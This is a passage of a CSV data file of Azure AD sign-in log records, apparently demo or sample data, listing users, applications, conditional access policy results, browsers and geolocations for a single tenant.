80.0.3987'}",669c457e-4441-4eab-88a8-07b7b6e91600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,669c457e-4441-4eab-88a8-07b7b6e91600,SigninLogs,Sucess,33.7984581,-84.38828278
+1192,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:39.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e0879587-034d-4c89-b36d-87381344e173,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5ba30877-fe5d-4dc4-8c19-e13f63c81400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,5ba30877-fe5d-4dc4-8c19-e13f63c81400,SigninLogs,Sucess,33.7984581,-84.38828278
+1193,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:22.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3913bddb-41cc-466e-a2eb-19cda5d9ebc4,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Reporting Web Services,[],notApplied,08/04/2020 17:54,{'deviceId': ''},db359221-fdda-4bf1-8b37-6f46cf161800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,db359221-fdda-4bf1-8b37-6f46cf161800,SigninLogs,Sucess,38.73078156,-78.17196655
+1194,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:20.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f8d7b9fb-7473-4b3e-a8ba-c6f9fff8ab1f,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:58,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",67310a2e-a313-4902-99ba-eeb2ee7d1400,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,67310a2e-a313-4902-99ba-eeb2ee7d1400,SigninLogs,Sucess,50.6406517,5.572050095
+1195,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:28.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,44d34bf0-e9da-400d-9027-05a5935ba13d,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5710832e-d5f6-411b-b39c-04492c3e1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5710832e-d5f6-411b-b39c-04492c3e1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1196,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:09.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,03db49e5-0381-4074-9022-c60d1c914e7f,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",687149c8-f736-4452-b785-99f3224e1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,687149c8-f736-4452-b785-99f3224e1700,SigninLogs,Sucess,36.6404686,-78.26995087
+1197,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:21.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,81350f23-e8cf-48b0-9cf2-5229652c4a82,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:48,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",3b0e5c51-5aba-4adb-89c0-6eab10a41500,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3b0e5c51-5aba-4adb-89c0-6eab10a41500,SigninLogs,Sucess,50.6406517,5.572050095
+1198,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:24.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,db8bea36-bed5-4498-9c5c-fc86e6f7262b,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",87802367-3de7-42c2-ada0-d6bc70891400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,87802367-3de7-42c2-ada0-d6bc70891400,SigninLogs,Sucess,33.7984581,-84.38828278
+1199,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:31.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ae4bb168-816c-4988-afd5-9bb3a91d0011,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d57fb780-1a14-4a75-9a44-f6b097941600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d57fb780-1a14-4a75-9a44-f6b097941600,SigninLogs,Sucess,41.90428925,-85.99833679
+1200,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:22.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3913bddb-41cc-466e-a2eb-19cda5d9ebc4,Microsoft.aadiam,Microsoft.aadiam,,Message Trace Reporting,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Reporting Web Services,[],notApplied,08/04/2020 17:54,{'deviceId': ''},db359221-fdda-4bf1-8b37-6f46cf161800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},Message Trace Reporting,430f7f57-0d1a-4a8a-b8f5-5c5c0770ecaa,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,db359221-fdda-4bf1-8b37-6f46cf161800,SigninLogs,Sucess,38.73078156,-78.17196655
+1201,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,48:37.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4c1bcb6b-d65e-46e5-8a50-d530fcd4cf43,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 